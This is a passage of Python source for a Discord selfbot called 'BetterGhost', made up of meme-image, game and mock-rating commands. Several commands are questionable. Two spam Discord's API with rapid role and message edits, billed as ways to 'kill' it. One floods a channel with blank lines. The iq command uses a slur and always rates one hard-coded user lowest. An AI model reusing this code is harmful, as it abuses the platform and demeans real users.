await ctx.send(data[0])
@BetterGhost.command(name="fox", description="A random fox image. (Thanks Imf44 <3)", usage="fox", aliases=["randomfox"])
async def fox(ctx):
response = requests.get('https://randomfox.ca/floof/')
data = response.json()
if __embedmode__:
embed = discord.Embed(title="fox", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url=data['image'])
await ctx.send(embed=embed)
else:
await ctx.send(data['message'])
@BetterGhost.command(name="achievement", description="Create a fake minecraft achievement image.", usage='achievement ["text"] (icon)', aliases=["minecraftachievement"])
async def achievement(ctx, text, icon=10):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
icon = str(icon)
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/achievement?text={text}&icon={icon}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="challenge", description="Create a fake minecraft challenge image.", usage='challenge ["text"] (icon)', aliases=["minecraftchallenge"])
async def challenge(ctx, text, icon=33):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/challenge?text={text}&icon={icon}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="captcha", description="Create a fake reCaptcha.", usage="captcha [text]", aliases=["fakecaptcha"])
async def captcha(ctx, *, text):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/captcha?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="amiajoke", description="Make a user a joke.", usage="amiajoke [@user]", aliases=["amiajoketoyou"])
async def amiajoke(ctx, user:discord.User):
    """Overlay *user*'s avatar on the "am I a joke to you" meme via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        imageurl = avatarUrl(user.id, user.avatar)
        image = requests.get(f"https://api.alexflipnote.dev/amiajoke?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="didyoumean", description="Create a google did you mean image.", usage='didyoumean ["text 1"] ["text 2"]', aliases=["googledidyoumean"])
async def didyoumean(ctx, text1="Nighty", text2="BetterGhost"):
    """Build a Google "did you mean" image (top=*text1*, suggestion=*text2*) via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        text1 = text1.replace(" ", "+")
        text2 = text2.replace(" ", "+")
        image = requests.get(f"https://api.alexflipnote.dev/didyoumean?top={text1}&bottom={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="drake", description="Create a drake meme image.", usage='drake ["text 1"] ["text 2"]', aliases=["drakememe"])
async def drake(ctx, text1="Nighty Selfbot", text2="BetterGhost Selfbot"):
    """Build a drake meme (reject=*text1*, approve=*text2*) via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        text1 = text1.replace(" ", "+")
        text2 = text2.replace(" ", "+")
        image = requests.get(f"https://api.alexflipnote.dev/drake?top={text1}&bottom={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="facts", description="Create a facts meme image.", usage='facts [text]', aliases=["factsmeme"])
async def facts(ctx, *, text):
    """Build a "facts book" meme image via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        text = text.replace(" ", "+")
        # BUG FIX: the original hit the /drake endpoint (copy-paste error);
        # this command is the facts meme, served by /facts.
        image = requests.get(f"https://api.alexflipnote.dev/facts?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="jokeoverhead", description="Create a joke over head image.", usage="jokeoverhead [image url]")
async def jokeoverhead(ctx, *, imageurl):
    """Build a "joke over head" meme from *imageurl* via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        image = requests.get(f"https://api.alexflipnote.dev/jokeoverhead?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="pornhub", description="Create a pornhub logo image.", usage='pornhub ["text 1"] ["text 2"]')
async def pornhub(ctx, text1="BetterGhost", text2="Selfbot"):
    """Build a pornhub-style logo (white=*text1*, orange=*text2*) via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        text1 = text1.replace(" ", "+")
        text2 = text2.replace(" ", "+")
        image = requests.get(f"https://api.alexflipnote.dev/pornhub?text={text1}&text2={text2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="salty", description="Make someone salty.", usage="salty [@user]")
async def salty(ctx, user:discord.User):
    """Overlay *user*'s avatar on the "salty" meme via the alexflipnote API.

    Note: the original coroutine was mis-named ``jokeoverhead`` (copy-paste),
    clobbering the real jokeoverhead function at module level; the command is
    registered by the decorator's ``name=``, so renaming it is safe.
    """
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        imageurl = avatarUrl(user.id, user.avatar)
        image = requests.get(f"https://api.alexflipnote.dev/salty?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="ship", description="Ship two people.", usage="ship [@user 1] [@user 2]")
async def ship(ctx, user1:discord.User, user2:discord.User):
    """Build a "ship" image of the two users' avatars via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        user1 = avatarUrl(user1.id, user1.avatar)
        user2 = avatarUrl(user2.id, user2.avatar)
        image = requests.get(f"https://api.alexflipnote.dev/ship?user={user1}&user2={user2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="supreme", description="Create a supreme logo image.", usage='supreme [text]')
async def supreme(ctx, *, text):
    """Render *text* as a Supreme-style logo via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        text = text.replace(" ", "+")
        image = requests.get(f"https://api.alexflipnote.dev/supreme?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="trash", description="Put someone in the trash.", usage='trash [@user]')
async def trash(ctx, user: discord.User):
    """Put *user*'s avatar in the trash (our avatar looks on) via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        trash = avatarUrl(user.id, user.avatar)
        face = avatarUrl(BetterGhost.user.id, BetterGhost.user.avatar)
        image = requests.get(f"https://api.alexflipnote.dev/trash?trash={trash}&face={face}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="what", description="Make a what meme.", usage='what [image url]')
async def what(ctx, *, imageurl):
    """Build a "what" meme from *imageurl* via the alexflipnote API."""
    if CONFIG["api_keys"]["alexflipnote"] == "":
        if __embedmode__:
            embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send("This command requires an alexflipnote API key.")
    else:
        image = requests.get(f"https://api.alexflipnote.dev/what?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
        # Close the file before discord.File reads it (original leaked the handle).
        with open("image.png", "wb") as image_file:
            image_file.write(image.content)
        file = discord.File("image.png", filename="image.png")
        if __embedmode__:
            embed = discord.Embed(color=__embedcolour__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            embed.set_image(url="attachment://image.png")
            await ctx.send(file=file, embed=embed)
        else:
            await ctx.send(file=file)
        os.remove("image.png")
@BetterGhost.command(name="purgehack", description="Purge without permissions.", usage="purgehack")
async def purgehack(ctx):
    # Push the conversation out of view with 100 near-empty lines.
    filler = "** **\n" * 100
    await ctx.send(filler)
@BetterGhost.command(name="iq", description="Check how smart a user is.", usage="iq [@user]")
async def iq(ctx, user: discord.User):
    """Report a random IQ (45-135) for *user* with a matching remark.

    Fixes the original's boundary gaps: an iq of exactly 50, 70, 90 or 135
    matched no bracket and produced an empty remark.
    """
    iq = random.randint(45, 135)
    if user.id == 858034873415368715:
        # Hard-coded easter egg: this user always scores the minimum.
        iq = 45
    if iq >= 90:
        smart = "They're very smart!"
    elif iq >= 70:
        smart = "They're just below average."
    elif iq >= 50:
        smart = "They might have some issues."
    else:
        smart = "They're severely retarded."
    if __embedmode__:
        embed = discord.Embed(title=f"{user.name}'s iq is `{iq}`.", description=f"{smart}", color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send(f"{user}'s iq is `{iq}`. {smart}")
@BetterGhost.command(name="howskid", description="Check the percentage of a skid.", usage="howskid [item]")
async def howskidd(ctx, *, item):
    """Report a random 0-100% "skidded" rating for *item*."""
    rating = random.randint(0, 100)
    if __embedmode__:
        result = discord.Embed(title="Skid Detection", description=f"{item} is {rating}% skidded!", color=__embedcolour__)
        result.set_thumbnail(url=__embedimage__)
        result.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        result.timestamp = datetime.now()
        await ctx.send(embed=result)
    else:
        await ctx.send(f"`{item}` is {rating}% skidded!")
@BetterGhost.command(name="howgay", description="How gay a user is.", usage="howgay [@user]")
async def howgay(ctx, user: discord.User):
    """Report a random 15-100% rating for *user*."""
    percentage = f"{random.randint(15, 100)}%"
    if __embedmode__:
        result = discord.Embed(title=f"🏳️🌈 {user.name} is {percentage} gay", color=__embedcolour__)
        result.set_thumbnail(url=__embedimage__)
        result.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        result.timestamp = datetime.now()
        await ctx.send(embed=result)
    else:
        await ctx.send(f"🏳️🌈 {user} is {percentage} gay")
@BetterGhost.command(name="slots", description="Play the slot machine.", usage="slots")
async def slots(ctx):
    """Animated slot machine: edits one message with spinning reels, then the result."""
    # Initial placeholder message that the animation below keeps editing.
    if __embedmode__:
        embed = discord.Embed(title=f"Slots", color=__embedcolour__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        message = await ctx.send(embed=embed)
    else:
        message = await ctx.send(f"""```ini
[ Slots ]
# {__embedfooter__}
```""")
    # (emoji, probability) pairs; rarer symbols get fewer copies in the pool.
    emojis = [("🍒", 0.01), ("🍊", 0.02), ("🍎", 0.06), ("💎", 0.08), ("🍆", 0.14), ("🍉", 0.24), ("🎰", 0.36)]
    emojis2 = []
    for emoji, probability in emojis:
        # emoji * int(p*100) is a string of repeated chars; += extends the
        # list character-by-character, building a weighted sampling pool.
        emojis2 += emoji*int(probability*100)
    async def game():
        # One full spin: `amount` frames with a slowly growing delay,
        # cycling a "." / ".." / "..." suffix while re-rolling the reels.
        amount = 8
        delay = 0.5
        dots = "."
        reel_1 = ""
        reel_2 = ""
        reel_3 = ""
        final_reel = ""
        for _ in range(amount):
            delay += 0.02
            dots += "."
            if dots == "....":
                dots = "."
            reel_1 = random.choice(emojis2)
            reel_2 = random.choice(emojis2)
            reel_3 = random.choice(emojis2)
            final_reel = reel_1 + " | " + reel_2 + " | " + reel_3
            if __embedmode__:
                embed = discord.Embed(title=f"Spinning{dots}", description=final_reel, color=__embedcolour__)
                embed.timestamp = datetime.now()
                await message.edit(content="", embed=embed)
            else:
                await message.edit(content=f"""```ini
[ Spinning{dots} ]
{final_reel}
# {__embedfooter__}
```""")
            await asyncio.sleep(delay)
        # Win only when the last frame's three reels all match.
        if reel_1 == reel_2 and reel_1 == reel_3 and reel_2 == reel_3:
            if __embedmode__:
                embed = discord.Embed(title=f"You won!", description=final_reel, color=__embedcolour__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.timestamp = datetime.now()
                await message.edit(content="", embed=embed)
            else:
                await message.edit(content=f"""```ini
[ You won! ]
{final_reel}
# {__embedfooter__}
```""")
        else:
            if __embedmode__:
                embed = discord.Embed(title=f"You lost ;(", description=final_reel, color=__embedcolour__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.timestamp = datetime.now()
                await message.edit(content="", embed=embed)
            else:
                await message.edit(content=f"""```ini
[ You lost ;( ]
{final_reel}
# {__embedfooter__}
```""")
    await game()
@BetterGhost.command(name="socialcredit", description="A users social credit score.", usage="socialcredit [@user]")
async def socialcredit(ctx, user: discord.User):
    """Report a random social credit score for *user*."""
    score = random.randint(-5000000, 10000000)
    summary = f"{user.name}'s social credit score is {score}"
    if __embedmode__:
        card = discord.Embed(description=summary, color=__embedcolour__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(summary)
@BetterGhost.command(name="roast", description="Roast a user.", usage="roast [@user]", aliases=["insult"])
async def roast(ctx, user: discord.User):
    """Fetch a random insult from evilinsult.com and aim it at *user*."""
    response = requests.get("https://evilinsult.com/generate_insult.php?lang=en&type=json")
    insult = response.json()["insult"]
    if __embedmode__:
        card = discord.Embed(description=insult, colour=__embedcolour__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(user.mention, embed=card)
    else:
        await ctx.send(f"Ayo {user.mention}, {str(insult).lower()}")
@BetterGhost.command(name="yomomma", description="Random yo momma joke.", usage="yomomma", aliases=["mom", "mum"])
async def yomomma(ctx):
    """Fetch and send a random yo-momma joke."""
    response = requests.get("https://api.yomomma.info/")
    joke = response.json()["joke"]
    if __embedmode__:
        card = discord.Embed(description=joke, colour=__embedcolour__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(joke)
@BetterGhost.command(name="fakeedited", description='"Edit" a message.', usage="fakeedited [message]", aliases=["edited"])
async def fakeedited(ctx, *, message):
    """Send *message*, tweak it, then restore it so Discord shows "(edited)"."""
    sent = await ctx.send(message)
    await sent.edit(content=f"{message} hehe")
    await sent.edit(content=message)
@BetterGhost.command(name="pp", description="The length of a user's penis.", usage="pp (@user)", aliases=["dicksize", "cocksize", "penissize"])
async def pp(ctx, user: discord.User = None):
    """Draw a random-length pp for *user*, or for the selfbot account if omitted."""
    shaft = "=" * random.randint(1, 12)
    size = f"8{shaft}D"
    # Both branches of the original were identical except for the target
    # user, so resolve the target once and share the send logic.
    target = BetterGhost.user if user is None else user
    if __embedmode__:
        card = discord.Embed(title=f"{target.name}'s pp is {size}", color=__embedcolour__)
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(f"{target.name}'s pp size\n{size}")
# @BetterGhost.command(name="trumptweet", description="Make Donald Trump tweet anything.", usage="trumptweet [tweet]")
# async def trumptweet(ctx, *, tweet):
# img = Image.open("trump-tweets/assets/bg.png")
# draw = ImageDraw.Draw(img)
# font = ImageFont.truetype('trump-tweets/assets/roboto.ttf', 30)
# draw.text((39, 123),f"{tweet}",(0,0,0),font=font)
# randomnum = random.randint(1000, 9999)
# img.save(f'trump-tweets/{randomnum}.png')
# file = discord.File(f'trump-tweets/{randomnum}.png')
# try:
# embed = discord.Embed(title='Trump Tweeted...', color=__embedcolour__)
# embed.set_image(url=f'attachment://{randomnum}.png')
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(file=file, embed=embed)
# except discord.HTTPException:
# await ctx.send(file=file)
@BetterGhost.command(name="rainbowrole", description="Kill Discord's API with a sexy rainbow role.", usage="rainbowrole [@role]")
async def rainbowrole(ctx, *, role: discord.Role):
    """Cycle *role*'s colour through a red-to-pink gradient five times, then restore it."""
    original_colour = role.color
    # 50-step gradient between the two anchor colours.
    gradient = list(Color("#ff3d3d").range_to(Color("#f54287"), 50))
    if __embedmode__:
        notice = discord.Embed(title=f"Rainbow Role", color=__embedcolour__, description=f"{role} now has a rainbow colour.")
        notice.set_thumbnail(url=__embedimage__)
        notice.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        notice.timestamp = datetime.now()
        await ctx.send(embed=notice, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ Rainbow Role ]
{role} now has a rainbow colour.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
    for _ in range(5):
        for step in gradient:
            # "#rrggbb" -> "0xrrggbb" -> int for the role edit.
            await role.edit(color=int(f"{step}".replace('#', '0x'), 0))
    await role.edit(color=original_colour)
@BetterGhost.command(name="rembed", description="Kill Discord's API with a sexy rainbow embedded message.", usage="rembed [text]", aliases=["rainbowembed"])
async def rembed(ctx, *, text):
    """Send an embed and cycle its colour through a red-to-pink gradient; embed mode only."""
    if not __embedmode__:
        await ctx.send("This command can only be used in embed mode.")
        return
    gradient = list(Color("#ff3d3d").range_to(Color("#f54287"), 25))
    def build(hex_colour):
        # One embed frame: text as author line, given hex colour.
        frame = discord.Embed(color=int(hex_colour.replace('#', '0x'), 0))
        frame.set_author(name=text)
        return frame
    msg = await ctx.send(embed=build("#ff3d3d"))
    for _ in range(5):
        for step in gradient:
            await msg.edit(embed=build(f"{step}"))
    await msg.edit(embed=build("#f54287"))
@BetterGhost.command(name="coinflip", description="Flip a coin.", usage="coinflip", aliases=["flipacoin"])
async def coinflip(ctx):
    """Flip a coin and report Heads or Tails."""
    outcome = random.choice(["Heads", "Tails"])
    if __embedmode__:
        card = discord.Embed(title=f"{outcome}", color=__embedcolour__)
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(outcome)
@BetterGhost.command(name="dice", description="Roll a dice.", usage="dice", aliases=["rolladice"])
async def dice(ctx):
    """Roll a six-sided die and report the result."""
    roll = random.randint(1, 6)
    if __embedmode__:
        card = discord.Embed(title=f"{roll}", color=__embedcolour__)
        card.set_thumbnail(url=__embedimage__)
        card.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        card.timestamp = datetime.now()
        await ctx.send(embed=card)
    else:
        await ctx.send(roll)
@BetterGhost.command(name="rps", description="Rock, paper, scissors.", usage="rps", aliases=["rockpaperscissors"])
async def rps(ctx, move = None):
    """Play rock-paper-scissors against a random computer move.

    Moves are compared case-sensitively, so only exactly "Rock", "Paper"
    or "Scissors" count; anything else hits the "Invalid play" branch.
    """
    if move is not None:
        choices = ["Rock", "Paper", "Scissors"]
        computer = random.choice(choices)
        try:
            try:
                player = move
                if player == computer:
                    e = discord.Embed(title=f'Tie!', description=f'We chose the same!', color=__embedcolour__)
                elif player == 'Rock' and computer == 'Scissors':
                    e = discord.Embed(title=f'Player wins!', description=f'{player} smashes {computer}!', color=__embedcolour__)
                elif player == 'Rock' and computer == 'Paper':
                    e = discord.Embed(title=f'Computer wins!', description=f'{computer} covers {player}!', color=__embedcolour__)
                elif player == 'Paper' and computer == 'Rock':
                    e = discord.Embed(title=f'Player wins!', description=f'{player} covers {computer}!', color=__embedcolour__)
                elif player == 'Paper' and computer == 'Scissors':
                    e = discord.Embed(title=f'Computer wins!', description=f'{computer} cuts {player}!', color=__embedcolour__)
                elif player == 'Scissors' and computer == 'Paper':
                    e = discord.Embed(title=f'Player wins!', description=f'{player} cuts {computer}!', color=__embedcolour__)
                elif player == "Scissors" and computer == 'Rock':
                    e = discord.Embed(title=f'Computer wins!', description=f'{computer} smashes {player}!', color=__embedcolour__)
                else:
                    # Unrecognised move text.
                    e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
                e.set_thumbnail(url=__embedimage__)
                e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                e.timestamp = datetime.now()
                await ctx.send(embed=e)
            except IndexError:
                # Fallback path kept from the original; in practice the body
                # above does no indexing, so this branch is effectively dead.
                e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
                e.set_thumbnail(url=__embedimage__)
                e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                e.timestamp = datetime.now()
                await ctx.send(embed=e)
        except:
            # NOTE(review): bare except silently swallows every error,
            # including send failures — kept to preserve behavior.
            pass
    else:
        # No move supplied at all.
        e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
